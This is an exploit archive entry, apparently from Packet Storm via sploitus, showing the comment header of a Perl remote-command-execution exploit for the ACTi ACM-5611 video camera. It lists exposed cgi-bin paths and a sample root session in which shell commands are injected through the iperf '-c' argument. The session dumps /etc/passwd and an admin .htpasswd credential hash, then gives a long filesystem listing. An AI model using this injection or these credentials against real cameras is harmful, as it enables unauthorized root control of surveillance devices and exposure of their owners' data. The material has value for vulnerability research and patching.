Share
## https://sploitus.com/exploit?id=PACKETSTORM:154626
#!/usr/bin/perl
#
# ACTi ACM-5611 Video Camera Remote Command Execution Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Firmware Version = A1D-220-V3.08.08-AC
# Production ID = ACM5611-08G-X-00485
# Factory Default Type = NTSC, Composite, Two Ways Audio (0x71)
# Company Name = ACTi Corporation
# WEB Site = www.acti.com
# Profile ID = MT9M131-RB0_V080507A
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [ ACTi ACM-5611 Video Camera Remote Command Execution Exploit
# # [ ============================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [ http://192.168.1.1/cgi-bin/./
# # [ http://192.168.1.1/cgi-bin/../
# # [ http://192.168.1.1/cgi-bin/80503736
# # [ http://192.168.1.1/cgi-bin/cmd/
# # [ http://192.168.1.1/cgi-bin/encoder
# # [ http://192.168.1.1/cgi-bin/macdev
# # [ http://192.168.1.1/cgi-bin/mpeg4
# # [ http://192.168.1.1/cgi-bin/system
# # [ http://192.168.1.1/cgi-bin/test
# # [ http://192.168.1.1/cgi-bin/update
# # [ http://192.168.1.1/cgi-bin/updatem
# # [ http://192.168.1.1/cgi-bin/url.cgi
# # [ http://192.168.1.1/cgi-bin/videoconfiguration.cgi
# # [ http://192.168.1.1/cgi-bin/web1.cgi
# # [
# # [ Got root?
# # [ # id
# # [ execute : /sbin/iperf -c ;id &
# # [ uid=0(root) gid=0(root)
# # [ # ls -la
# # [ execute : /sbin/iperf -c ;ls -la &
# # [ -rwxr-xr-x 1 0 0 211088 web1.cgi
# # [ -rwxr-xr-x 1 0 0 106124 encoder
# # [ -rwxr-xr-x 1 0 0 54084 test
# # [ -rwxr-xr-x 1 0 0 79756 mpeg4
# # [ -rwxr-xr-x 1 0 0 89604 system
# # [ -rwxr-xr-x 1 0 0 21592 macdev
# # [ -rwxr-xr-x 1 0 0 57504 updatem
# # [ -rwxr-xr-x 1 0 0 58560 update
# # [ lrwxrwxrwx 1 0 0 8 videoconfiguration.cgi -> web1.cgi
# # [ lrwxrwxrwx 1 0 0 6 url.cgi -> system
# # [ -rwxr-xr-x 1 0 0 52888 80503736
# # [ drwxr-xr-x 2 0 0 1024 cmd
# # [ drwxr-xr-x 5 0 0 1024 ..
# # [ drw-r--r-- 3 0 0 1024 .
# # [ # ls -la /var/log/
# # [ execute : /sbin/iperf -c ;ls -la /var/log/ &
# # [ -rw-r--r-- 1 0 0 259 system_info_url.txt
# # [ -rw-r--r-- 1 0 0 259 system_info_web.txt
# # [ -rw-r--r-- 1 0 0 82 wan_info_brief.txt
# # [ -rw-r--r-- 1 0 0 455 systemlog.txt
# # [ drwxr-xr-x 5 0 0 1024 ..
# # [ drwxr-xr-x 2 0 0 1024 .
# # [ # cat /etc/passwd
# # [ execute : /sbin/iperf -c ;cat /etc/passwd &
# # [ root::0:0:root:/root:/bin/bash
# # [ bin:*:1:1:bin:/bin:
# # [ daemon:*:2:2:daemon:/usr/sbin:
# # [ sys:*:3:3:sys:/dev:
# # [ adm:*:4:4:adm:/var/adm:
# # [ lp:*:5:7:lp:/var/spool/lpd:
# # [ sync:*:6:8:sync:/bin:/bin/sync
# # [ shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
# # [ halt:*:8:10:halt:/sbin:/sbin/halt
# # [ mail:*:9:11:mail:/var/spool/mail:
# # [ news:*:10:12:news:/var/spool/news:
# # [ uucp:*:11:13:uucp:/var/spool/uucp:
# # [ operator:*:12:0:operator:/root:
# # [ games:*:13:100:games:/usr/games:
# # [ ftp:*:15:14:ftp:/var/ftp:
# # [ man:*:16:100:man:/var/cache/man:
# # [ nobody:*:65534:65534:nobody:/home:/bin/sh
# # [ # cat cmd/.htpasswd
# # [ execute : /sbin/iperf -c ;cat cmd/.htpasswd &
# # [ admin:dUHDw321YSAkP
# # [ Admin:dUHDw321YSAkP
# # [ # find / -type f
# # [ execute : /sbin/iperf -c ;find / -type f &
# # [ /bin/busybox
# # [ /etc/fstab
# # [ /etc/thttpd/thttpd.conf
# # [ /etc/thttpd/thttpd.throttles
# # [ /etc/services
# # [ /etc/resolv.conf
# # [ /etc/profile
# # [ /etc/init.d/rcS
# # [ /etc/init.d/bootstrap
# # [ /etc/init.d/oem_load
# # [ /etc/init.d/system_load
# # [ /etc/init.d/thttpd
# # [ /etc/init.d/daemon_manager
# # [ /etc/init.d/modules
# # [ /etc/init.d/ddns
# # [ /etc/init.d/syslog
# # [ /etc/init.d/hostname
# # [ /etc/init.d/set_port_speed
# # [ /etc/init.d/get_wan_config
# # [ /etc/init.d/myserver
# # [ /etc/init.d/wan
# # [ /etc/init.d/datetime
# # [ /etc/init.d/dns
# # [ /etc/init.d/boot_sync
# # [ /etc/init.d/profile_load
# # [ /etc/init.d/datetime_rackmount
# # [ /etc/group
# # [ /etc/passwd
# # [ /etc/host.conf
# # [ /etc/inittab
# # [ /etc/ppp/plugins/rp-pppoe.so
# # [ /etc/ppp/resolv.conf
# # [ /etc/ppp/ip-down
# # [ /etc/ppp/ip-up
# # [ /etc/protocols
# # [ /etc/config/update.conf
# # [ /etc/default/default.conf
# # [ /etc/default/version
# # [ /etc/default/default.pppoe
# # [ /etc/default/build_date
# # [ /etc/default/global_options
# # [ /etc/default/boot_version
# # [ /etc/default/profile/camera.bin
# # [ /etc/default/profile/firmware.bin
# # [ /etc/default/profile/profile_id
# # [ /etc/default/profile/NameMap
# # [ /etc/default/profile/camera_adj.bin
# # [ /etc/default/profile/fw_cap.bin
# # [ /etc/default/model
# # [ /etc/default/fw_type
# # [ /etc/default/device
# # [ /etc/default/mac
# # [ /etc/default/serial
# # [ /etc/default/property
# # [ /etc/hosts
# # [ /lib/ld-uClibc-0.9.15.so
# # [ /lib/libcrypt-0.9.15.so
# # [ /lib/libdl-0.9.15.so
# # [ /lib/libm-0.9.15.so
# # [ /lib/libpthread-0.9.15.so
# # [ /lib/libresolv-0.9.15.so
# # [ /lib/libuClibc-0.9.15.so
# # [ /lib/libutil-0.9.15.so
# # [ /lib/modules/2.4.19-rmk4/acap_drv.o
# # [ /lib/modules/2.4.19-rmk4/ds1339_rtc.o
# # [ /lib/modules/2.4.19-rmk4/sound_drv.o
# # [ /proc/mtd
# # [ /proc/asoc2200_eth/DATA
# # [ /proc/misc
# # [ /proc/cpu/alignment
# # [ /proc/tty/drivers
# # [ /proc/tty/ldiscs
# # [ /proc/tty/driver/serial
# # [ /proc/sys/abi/fake_utsname
# # [ /proc/sys/abi/trace
# # [ /proc/sys/abi/defhandler_libcso
# # [ /proc/sys/abi/defhandler_lcall7
# # [ /proc/sys/abi/defhandler_elf
# # [ /proc/sys/abi/defhandler_coff
# # [ /proc/sys/fs/lease-break-time
# # [ /proc/sys/fs/dir-notify-enable
# # [ /proc/sys/fs/leases-enable
# # [ /proc/sys/fs/overflowgid
# # [ /proc/sys/fs/overflowuid
# # [ /proc/sys/fs/dentry-state
# # [ /proc/sys/fs/dquot-nr
# # [ /proc/sys/fs/file-max
# # [ /proc/sys/fs/file-nr
# # [ /proc/sys/fs/inode-state
# # [ /proc/sys/fs/inode-nr
# # [ /proc/sys/net/unix/max_dgram_qlen
# # [ /proc/sys/net/ipv4/conf/eth0/arp_filter
# # [ /proc/sys/net/ipv4/conf/eth0/tag
# # [ /proc/sys/net/ipv4/conf/eth0/log_martians
# # [ /proc/sys/net/ipv4/conf/eth0/bootp_relay
# # [ /proc/sys/net/ipv4/conf/eth0/medium_id
# # [ /proc/sys/net/ipv4/conf/eth0/proxy_arp
# # [ /proc/sys/net/ipv4/conf/eth0/accept_source_route
# # [ /proc/sys/net/ipv4/conf/eth0/send_redirects
# # [ /proc/sys/net/ipv4/conf/eth0/rp_filter
# # [ /proc/sys/net/ipv4/conf/eth0/shared_media
# # [ /proc/sys/net/ipv4/conf/eth0/secure_redirects
# # [ /proc/sys/net/ipv4/conf/eth0/accept_redirects
# # [ /proc/sys/net/ipv4/conf/eth0/mc_forwarding
# # [ /proc/sys/net/ipv4/conf/eth0/forwarding
# # [ /proc/sys/net/ipv4/conf/default/arp_filter
# # [ /proc/sys/net/ipv4/conf/default/tag
# # [ /proc/sys/net/ipv4/conf/default/log_martians
# # [ /proc/sys/net/ipv4/conf/default/bootp_relay
# # [ /proc/sys/net/ipv4/conf/default/medium_id
# # [ /proc/sys/net/ipv4/conf/default/proxy_arp
# # [ /proc/sys/net/ipv4/conf/default/accept_source_route
# # [ /proc/sys/net/ipv4/conf/default/send_redirects
# # [ /proc/sys/net/ipv4/conf/default/rp_filter
# # [ /proc/sys/net/ipv4/conf/default/shared_media
# # [ /proc/sys/net/ipv4/conf/default/secure_redirects
# # [ /proc/sys/net/ipv4/conf/default/accept_redirects
# # [ /proc/sys/net/ipv4/conf/default/mc_forwarding
# # [ /proc/sys/net/ipv4/conf/default/forwarding
# # [ /proc/sys/net/ipv4/conf/all/arp_filter
# # [ /proc/sys/net/ipv4/conf/all/tag
# # [ /proc/sys/net/ipv4/conf/all/log_martians
# # [ /proc/sys/net/ipv4/conf/all/bootp_relay
# # [ /proc/sys/net/ipv4/conf/all/medium_id
# # [ /proc/sys/net/ipv4/conf/all/proxy_arp
# # [ /proc/sys/net/ipv4/conf/all/accept_source_route
# # [ /proc/sys/net/ipv4/conf/all/send_redirects
# # [ /proc/sys/net/ipv4/conf/all/rp_filter
# # [ /proc/sys/net/ipv4/conf/all/shared_media
# # [ /proc/sys/net/ipv4/conf/all/secure_redirects
# # [ /proc/sys/net/ipv4/conf/all/accept_redirects
# # [ /proc/sys/net/ipv4/conf/all/mc_forwarding
# # [ /proc/sys/net/ipv4/conf/all/forwarding
# # [ /proc/sys/net/ipv4/neigh/eth0/locktime
# # [ /proc/sys/net/ipv4/neigh/eth0/proxy_delay
# # [ /proc/sys/net/ipv4/neigh/eth0/anycast_delay
# # [ /proc/sys/net/ipv4/neigh/eth0/proxy_qlen
# # [ /proc/sys/net/ipv4/neigh/eth0/unres_qlen
# # [ /proc/sys/net/ipv4/neigh/eth0/gc_stale_time
# # [ /proc/sys/net/ipv4/neigh/eth0/delay_first_probe_time
# # [ /proc/sys/net/ipv4/neigh/eth0/base_reachable_time
# # [ /proc/sys/net/ipv4/neigh/eth0/retrans_time
# # [ /proc/sys/net/ipv4/neigh/eth0/app_solicit
# # [ /proc/sys/net/ipv4/neigh/eth0/ucast_solicit
# # [ /proc/sys/net/ipv4/neigh/eth0/mcast_solicit
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh3
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh2
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh1
# # [ /proc/sys/net/ipv4/neigh/default/gc_interval
# # [ /proc/sys/net/ipv4/neigh/default/locktime
# # [ /proc/sys/net/ipv4/neigh/default/proxy_delay
# # [ /proc/sys/net/ipv4/neigh/default/anycast_delay
# # [ /proc/sys/net/ipv4/neigh/default/proxy_qlen
# # [ /proc/sys/net/ipv4/neigh/default/unres_qlen
# # [ /proc/sys/net/ipv4/neigh/default/gc_stale_time
# # [ /proc/sys/net/ipv4/neigh/default/delay_first_probe_time
# # [ /proc/sys/net/ipv4/neigh/default/base_reachable_time
# # [ /proc/sys/net/ipv4/neigh/default/retrans_time
# # [ /proc/sys/net/ipv4/neigh/default/app_solicit
# # [ /proc/sys/net/ipv4/neigh/default/ucast_solicit
# # [ /proc/sys/net/ipv4/neigh/default/mcast_solicit
# # [ /proc/sys/net/ipv4/tcp_tw_reuse
# # [ /proc/sys/net/ipv4/icmp_ratemask
# # [ /proc/sys/net/ipv4/icmp_ratelimit
# # [ /proc/sys/net/ipv4/tcp_adv_win_scale
# # [ /proc/sys/net/ipv4/tcp_app_win
# # [ /proc/sys/net/ipv4/tcp_rmem
# # [ /proc/sys/net/ipv4/tcp_wmem
# # [ /proc/sys/net/ipv4/tcp_mem
# # [ /proc/sys/net/ipv4/tcp_dsack
# # [ /proc/sys/net/ipv4/tcp_ecn
# # [ /proc/sys/net/ipv4/tcp_reordering
# # [ /proc/sys/net/ipv4/tcp_fack
# # [ /proc/sys/net/ipv4/tcp_orphan_retries
# # [ /proc/sys/net/ipv4/inet_peer_gc_maxtime
# # [ /proc/sys/net/ipv4/inet_peer_gc_mintime
# # [ /proc/sys/net/ipv4/inet_peer_maxttl
# # [ /proc/sys/net/ipv4/inet_peer_minttl
# # [ /proc/sys/net/ipv4/inet_peer_threshold
# # [ /proc/sys/net/ipv4/route/min_adv_mss
# # [ /proc/sys/net/ipv4/route/min_pmtu
# # [ /proc/sys/net/ipv4/route/mtu_expires
# # [ /proc/sys/net/ipv4/route/gc_elasticity
# # [ /proc/sys/net/ipv4/route/error_burst
# # [ /proc/sys/net/ipv4/route/error_cost
# # [ /proc/sys/net/ipv4/route/redirect_silence
# # [ /proc/sys/net/ipv4/route/redirect_number
# # [ /proc/sys/net/ipv4/route/redirect_load
# # [ /proc/sys/net/ipv4/route/gc_interval
# # [ /proc/sys/net/ipv4/route/gc_timeout
# # [ /proc/sys/net/ipv4/route/gc_min_interval
# # [ /proc/sys/net/ipv4/route/max_size
# # [ /proc/sys/net/ipv4/route/gc_thresh
# # [ /proc/sys/net/ipv4/route/max_delay
# # [ /proc/sys/net/ipv4/route/min_delay
# # [ /proc/sys/net/ipv4/route/flush
# # [ /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
# # [ /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
# # [ /proc/sys/net/ipv4/icmp_echo_ignore_all
# # [ /proc/sys/net/ipv4/ip_local_port_range
# # [ /proc/sys/net/ipv4/tcp_max_syn_backlog
# # [ /proc/sys/net/ipv4/tcp_rfc1337
# # [ /proc/sys/net/ipv4/tcp_stdurg
# # [ /proc/sys/net/ipv4/tcp_abort_on_overflow
# # [ /proc/sys/net/ipv4/tcp_tw_recycle
# # [ /proc/sys/net/ipv4/tcp_fin_timeout
# # [ /proc/sys/net/ipv4/tcp_retries2
# # [ /proc/sys/net/ipv4/tcp_retries1
# # [ /proc/sys/net/ipv4/tcp_keepalive_intvl
# # [ /proc/sys/net/ipv4/tcp_keepalive_probes
# # [ /proc/sys/net/ipv4/tcp_keepalive_time
# # [ /proc/sys/net/ipv4/ipfrag_time
# # [ /proc/sys/net/ipv4/ip_dynaddr
# # [ /proc/sys/net/ipv4/ipfrag_low_thresh
# # [ /proc/sys/net/ipv4/ipfrag_high_thresh
# # [ /proc/sys/net/ipv4/tcp_max_tw_buckets
# # [ /proc/sys/net/ipv4/tcp_max_orphans
# # [ /proc/sys/net/ipv4/tcp_synack_retries
# # [ /proc/sys/net/ipv4/tcp_syn_retries
# # [ /proc/sys/net/ipv4/ip_nonlocal_bind
# # [ /proc/sys/net/ipv4/ip_no_pmtu_disc
# # [ /proc/sys/net/ipv4/ip_autoconfig
# # [ /proc/sys/net/ipv4/ip_default_ttl
# # [ /proc/sys/net/ipv4/ip_forward
# # [ /proc/sys/net/ipv4/tcp_retrans_collapse
# # [ /proc/sys/net/ipv4/tcp_sack
# # [ /proc/sys/net/ipv4/tcp_window_scaling
# # [ /proc/sys/net/ipv4/tcp_timestamps
# # [ /proc/sys/net/core/hot_list_length
# # [ /proc/sys/net/core/optmem_max
# # [ /proc/sys/net/core/message_burst
# # [ /proc/sys/net/core/message_cost
# # [ /proc/sys/net/core/mod_cong
# # [ /proc/sys/net/core/lo_cong
# # [ /proc/sys/net/core/no_cong
# # [ /proc/sys/net/core/no_cong_thresh
# # [ /proc/sys/net/core/netdev_max_backlog
# # [ /proc/sys/net/core/rmem_default
# # [ /proc/sys/net/core/wmem_default
# # [ /proc/sys/net/core/rmem_max
# # [ /proc/sys/net/core/wmem_max
# # [ /proc/sys/vm/max_map_count
# # [ /proc/sys/vm/max-readahead
# # [ /proc/sys/vm/min-readahead
# # [ /proc/sys/vm/page-cluster
# # [ /proc/sys/vm/pagetable_cache
# # [ /proc/sys/vm/kswapd
# # [ /proc/sys/vm/overcommit_memory
# # [ /proc/sys/vm/bdflush
# # [ /proc/sys/kernel/overflowgid
# # [ /proc/sys/kernel/overflowuid
# # [ /proc/sys/kernel/random/uuid
# # [ /proc/sys/kernel/random/boot_id
# # [ /proc/sys/kernel/random/write_wakeup_threshold
# # [ /proc/sys/kernel/random/read_wakeup_threshold
# # [ /proc/sys/kernel/random/entropy_avail
# # [ /proc/sys/kernel/random/poolsize
# # [ /proc/sys/kernel/threads-max
# # [ /proc/sys/kernel/cad_pid
# # [ /proc/sys/kernel/sem
# # [ /proc/sys/kernel/msgmnb
# # [ /proc/sys/kernel/msgmni
# # [ /proc/sys/kernel/msgmax
# # [ /proc/sys/kernel/shmmni
# # [ /proc/sys/kernel/shmall
# # [ /proc/sys/kernel/shmmax
# # [ /proc/sys/kernel/rtsig-max
# # [ /proc/sys/kernel/rtsig-nr
# # [ /proc/sys/kernel/printk
# # [ /proc/sys/kernel/ctrl-alt-del
# # [ /proc/sys/kernel/real-root-dev
# # [ /proc/sys/kernel/cap-bound
# # [ /proc/sys/kernel/tainted
# # [ /proc/sys/kernel/core_uses_pid
# # [ /proc/sys/kernel/panic
# # [ /proc/sys/kernel/domainname
# # [ /proc/sys/kernel/hostname
# # [ /proc/sys/kernel/version
# # [ /proc/sys/kernel/osrelease
# # [ /proc/sys/kernel/ostype
# # [ /proc/sysvipc/shm
# # [ /proc/sysvipc/msg
# # [ /proc/sysvipc/sem
# # [ /proc/net/packet
# # [ /proc/net/unix
# # [ /proc/net/udp
# # [ /proc/net/tcp
# # [ /proc/net/sockstat
# # [ /proc/net/snmp
# # [ /proc/net/netstat
# # [ /proc/net/raw
# # [ /proc/net/rt_cache_stat
# # [ /proc/net/rt_cache
# # [ /proc/net/route
# # [ /proc/net/arp
# # [ /proc/net/netlink
# # [ /proc/net/pppoe
# # [ /proc/net/dev_mcast
# # [ /proc/net/softnet_stat
# # [ /proc/net/dev
# # [ /proc/kcore
# # [ /proc/ksyms
# # [ /proc/slabinfo
# # [ /proc/cpuinfo
# # [ /proc/kmsg
# # [ /proc/execdomains
# # [ /proc/iomem
# # [ /proc/swaps
# # [ /proc/locks
# # [ /proc/cmdline
# # [ /proc/ioports
# # [ /proc/filesystems
# # [ /proc/interrupts
# # [ /proc/partitions
# # [ /proc/devices
# # [ /proc/stat
# # [ /proc/modules
# # [ /proc/version
# # [ /proc/meminfo
# # [ /proc/uptime
# # [ /proc/loadavg
# # [ /proc/1/environ
# # [ /proc/1/status
# # [ /proc/1/cmdline
# # [ /proc/1/stat
# # [ /proc/1/statm
# # [ /proc/1/maps
# # [ /proc/1/mem
# # [ /proc/1/mounts
# # [ /proc/2/environ
# # [ /proc/2/status
# # [ /proc/2/cmdline
# # [ /proc/2/stat
# # [ /proc/2/statm
# # [ /proc/2/maps
# # [ /proc/2/mem
# # [ /proc/2/mounts
# # [ /proc/3/environ
# # [ /proc/3/status
# # [ /proc/3/cmdline
# # [ /proc/3/stat
# # [ /proc/3/statm
# # [ /proc/3/maps
# # [ /proc/3/mem
# # [ /proc/3/mounts
# # [ /proc/4/environ
# # [ /proc/4/status
# # [ /proc/4/cmdline
# # [ /proc/4/stat
# # [ /proc/4/statm
# # [ /proc/4/maps
# # [ /proc/4/mem
# # [ /proc/4/mounts
# # [ /proc/5/environ
# # [ /proc/5/status
# # [ /proc/5/cmdline
# # [ /proc/5/stat
# # [ /proc/5/statm
# # [ /proc/5/maps
# # [ /proc/5/mem
# # [ /proc/5/mounts
# # [ /proc/6/environ
# # [ /proc/6/status
# # [ /proc/6/cmdline
# # [ /proc/6/stat
# # [ /proc/6/statm
# # [ /proc/6/maps
# # [ /proc/6/mem
# # [ /proc/6/mounts
# # [ find: /proc/7/fd: No such file or directory
# # [ /proc/7/environ
# # [ /proc/7/status
# # [ /proc/7/cmdline
# # [ /proc/7/stat
# # [ /proc/7/statm
# # [ /proc/7/maps
# # [ /proc/7/mem
# # [ /proc/7/mounts
# # [ /proc/14/environ
# # [ /proc/14/status
# # [ /proc/14/cmdline
# # [ /proc/14/stat
# # [ /proc/14/statm
# # [ /proc/14/maps
# # [ /proc/14/mem
# # [ /proc/14/mounts
# # [ /proc/132/environ
# # [ /proc/132/status
# # [ /proc/132/cmdline
# # [ /proc/132/stat
# # [ /proc/132/statm
# # [ /proc/132/maps
# # [ /proc/132/mem
# # [ /proc/132/mounts
# # [ /proc/142/environ
# # [ /proc/142/status
# # [ /proc/142/cmdline
# # [ /proc/142/stat
# # [ /proc/142/statm
# # [ /proc/142/maps
# # [ /proc/142/mem
# # [ /proc/142/mounts
# # [ /proc/153/environ
# # [ /proc/153/status
# # [ /proc/153/cmdline
# # [ /proc/153/stat
# # [ /proc/153/statm
# # [ /proc/153/maps
# # [ /proc/153/mem
# # [ /proc/153/mounts
# # [ /proc/154/environ
# # [ /proc/154/status
# # [ /proc/154/cmdline
# # [ /proc/154/stat
# # [ /proc/154/statm
# # [ /proc/154/maps
# # [ /proc/154/mem
# # [ /proc/154/mounts
# # [ /proc/157/environ
# # [ /proc/157/status
# # [ /proc/157/cmdline
# # [ /proc/157/stat
# # [ /proc/157/statm
# # [ /proc/157/maps
# # [ /proc/157/mem
# # [ /proc/157/mounts
# # [ /proc/164/environ
# # [ /proc/164/status
# # [ /proc/164/cmdline
# # [ /proc/164/stat
# # [ /proc/164/statm
# # [ /proc/164/maps
# # [ /proc/164/mem
# # [ /proc/164/mounts
# # [ /proc/171/environ
# # [ /proc/171/status
# # [ /proc/171/cmdline
# # [ /proc/171/stat
# # [ /proc/171/statm
# # [ /proc/171/maps
# # [ /proc/171/mem
# # [ /proc/171/mounts
# # [ /proc/172/environ
# # [ /proc/172/status
# # [ /proc/172/cmdline
# # [ /proc/172/stat
# # [ /proc/172/statm
# # [ /proc/172/maps
# # [ /proc/172/mem
# # [ /proc/172/mounts
# # [ /proc/173/environ
# # [ /proc/173/status
# # [ /proc/173/cmdline
# # [ /proc/173/stat
# # [ /proc/173/statm
# # [ /proc/173/maps
# # [ /proc/173/mem
# # [ /proc/173/mounts
# # [ /proc/174/environ
# # [ /proc/174/status
# # [ /proc/174/cmdline
# # [ /proc/174/stat
# # [ /proc/174/statm
# # [ /proc/174/maps
# # [ /proc/174/mem
# # [ /proc/174/mounts
# # [ /proc/175/environ
# # [ /proc/175/status
# # [ /proc/175/cmdline
# # [ /proc/175/stat
# # [ /proc/175/statm
# # [ /proc/175/maps
# # [ /proc/175/mem
# # [ /proc/175/mounts
# # [ /proc/16706/environ
# # [ /proc/16706/status
# # [ /proc/16706/cmdline
# # [ /proc/16706/stat
# # [ /proc/16706/statm
# # [ /proc/16706/maps
# # [ /proc/16706/mem
# # [ /proc/16706/mounts
# # [ /proc/16707/environ
# # [ /proc/16707/status
# # [ /proc/16707/cmdline
# # [ /proc/16707/stat
# # [ /proc/16707/statm
# # [ /proc/16707/maps
# # [ /proc/16707/mem
# # [ /proc/16707/mounts
# # [ /proc/16708/environ
# # [ /proc/16708/status
# # [ /proc/16708/cmdline
# # [ /proc/16708/stat
# # [ /proc/16708/statm
# # [ /proc/16708/maps
# # [ /proc/16708/mem
# # [ /proc/16708/mounts
# # [ /proc/16709/environ
# # [ /proc/16709/status
# # [ /proc/16709/cmdline
# # [ /proc/16709/stat
# # [ /proc/16709/statm
# # [ /proc/16709/maps
# # [ /proc/16709/mem
# # [ /proc/16709/mounts
# # [ /proc/26139/environ
# # [ /proc/26139/status
# # [ /proc/26139/cmdline
# # [ /proc/26139/stat
# # [ /proc/26139/statm
# # [ /proc/26139/maps
# # [ /proc/26139/mem
# # [ /proc/26139/mounts
# # [ /proc/29140/environ
# # [ /proc/29140/status
# # [ /proc/29140/cmdline
# # [ /proc/29140/stat
# # [ /proc/29140/statm
# # [ /proc/29140/maps
# # [ /proc/29140/mem
# # [ /proc/29140/mounts
# # [ /proc/29176/environ
# # [ /proc/29176/status
# # [ /proc/29176/cmdline
# # [ /proc/29176/stat
# # [ /proc/29176/statm
# # [ /proc/29176/maps
# # [ /proc/29176/mem
# # [ /proc/29176/mounts
# # [ /proc/7727/environ
# # [ /proc/7727/status
# # [ /proc/7727/cmdline
# # [ /proc/7727/stat
# # [ /proc/7727/statm
# # [ /proc/7727/maps
# # [ /proc/7727/mem
# # [ /proc/7727/mounts
# # [ /proc/7728/environ
# # [ /proc/7728/status
# # [ /proc/7728/cmdline
# # [ /proc/7728/stat
# # [ /proc/7728/statm
# # [ /proc/7728/maps
# # [ /proc/7728/mem
# # [ /proc/7728/mounts
# # [ /proc/7729/environ
# # [ /proc/7729/status
# # [ /proc/7729/cmdline
# # [ /proc/7729/stat
# # [ /proc/7729/statm
# # [ /proc/7729/maps
# # [ /proc/7729/mem
# # [ /proc/7729/mounts
# # [ /proc/23419/environ
# # [ /proc/23419/status
# # [ /proc/23419/cmdline
# # [ /proc/23419/stat
# # [ /proc/23419/statm
# # [ /proc/23419/maps
# # [ /proc/23419/mem
# # [ /proc/23419/mounts
# # [ /proc/14789/environ
# # [ /proc/14789/status
# # [ /proc/14789/cmdline
# # [ /proc/14789/stat
# # [ /proc/14789/statm
# # [ /proc/14789/maps
# # [ /proc/14789/mem
# # [ /proc/14789/mounts
# # [ /proc/14790/environ
# # [ /proc/14790/status
# # [ /proc/14790/cmdline
# # [ /proc/14790/stat
# # [ /proc/14790/statm
# # [ /proc/14790/maps
# # [ /proc/14790/mem
# # [ /proc/14790/mounts
# # [ /proc/14791/environ
# # [ /proc/14791/status
# # [ /proc/14791/cmdline
# # [ /proc/14791/stat
# # [ /proc/14791/statm
# # [ /proc/14791/maps
# # [ /proc/14791/mem
# # [ /proc/14791/mounts
# # [ /proc/16682/environ
# # [ /proc/16682/status
# # [ /proc/16682/cmdline
# # [ /proc/16682/stat
# # [ /proc/16682/statm
# # [ /proc/16682/maps
# # [ /proc/16682/mem
# # [ /proc/16682/mounts
# # [ /proc/22978/environ
# # [ /proc/22978/status
# # [ /proc/22978/cmdline
# # [ /proc/22978/stat
# # [ /proc/22978/statm
# # [ /proc/22978/maps
# # [ /proc/22978/mem
# # [ /proc/22978/mounts
# # [ /proc/22979/environ
# # [ /proc/22979/status
# # [ /proc/22979/cmdline
# # [ /proc/22979/stat
# # [ /proc/22979/statm
# # [ /proc/22979/maps
# # [ /proc/22979/mem
# # [ /proc/22979/mounts
# # [ /proc/27240/environ
# # [ /proc/27240/status
# # [ /proc/27240/cmdline
# # [ /proc/27240/stat
# # [ /proc/27240/statm
# # [ /proc/27240/maps
# # [ /proc/27240/mem
# # [ /proc/27240/mounts
# # [ /proc/27241/environ
# # [ /proc/27241/status
# # [ /proc/27241/cmdline
# # [ /proc/27241/stat
# # [ /proc/27241/statm
# # [ /proc/27241/maps
# # [ /proc/27241/mem
# # [ /proc/27241/mounts
# # [ /proc/20414/environ
# # [ /proc/20414/status
# # [ /proc/20414/cmdline
# # [ /proc/20414/stat
# # [ /proc/20414/statm
# # [ /proc/20414/maps
# # [ /proc/20414/mem
# # [ /proc/20414/mounts
# # [ /proc/9117/environ
# # [ /proc/9117/status
# # [ /proc/9117/cmdline
# # [ /proc/9117/stat
# # [ /proc/9117/statm
# # [ /proc/9117/maps
# # [ /proc/9117/mem
# # [ /proc/9117/mounts
# # [ /proc/9120/environ
# # [ /proc/9120/status
# # [ /proc/9120/cmdline
# # [ /proc/9120/stat
# # [ /proc/9120/statm
# # [ /proc/9120/maps
# # [ /proc/9120/mem
# # [ /proc/9120/mounts
# # [ /sbin/dhcpcd
# # [ /sbin/ez-ipupdate
# # [ /sbin/htpasswd
# # [ /sbin/iperf
# # [ /sbin/thttpd
# # [ /usr/sbin/mount_nfs_drive
# # [ /usr/sbin/ll
# # [ /usr/sbin/system_info
# # [ /usr/sbin/read_dev_info
# # [ /usr/sbin/acti_config
# # [ /usr/sbin/show_progress
# # [ /usr/sbin/ddns_monitor
# # [ /usr/sbin/wan_status
# # [ /usr/sbin/adsl-connect
# # [ /usr/sbin/adsl-setup
# # [ /usr/sbin/acti_report
# # [ /usr/sbin/pppd
# # [ /usr/sbin/pppoe
# # [ /usr/sbin/acti_upgrade
# # [ /usr/sbin/thttpd_monitor
# # [ /usr/sbin/acti_485
# # [ /usr/sbin/dbg
# # [ /usr/sbin/ntpclient
# # [ /usr/sbin/acti_upgradem
# # [ /usr/sbin/dhcp_retry
# # [ /usr/sbin/pppoe_monitor
# # [ /usr/sbin/acti_reboot
# # [ /usr/sbin/acti_msg
# # [ /usr/sbin/mount_tmpfs
# # [ /usr/sbin/shell_relay
# # [ /usr/sbin/acti_logger
# # [ /usr/sbin/boot_ctrl
# # [ /usr/sbin/acti_gpio
# # [ /usr/sbin/acti_rs485
# # [ /usr/sbin/acti_rtc
# # [ /usr/sbin/acti_reg
# # [ /usr/sbin/conf_sync
# # [ /usr/sbin/conf_convert
# # [ /usr/sbin/bin2devinfo
# # [ /usr/sbin/audio_tester
# # [ /usr/sbin/bin2profile
# # [ /usr/sbin/acti-server
# # [ /usr/bin/setsid
# # [ /var/run/dev.bin
# # [ /var/run/system_type
# # [ /var/run/channel
# # [ /var/run/sys_conf.bin
# # [ /var/run/wan_state
# # [ /var/run/wanip_config
# # [ /var/run/encoder_run
# # [ /var/log/systemlog.txt
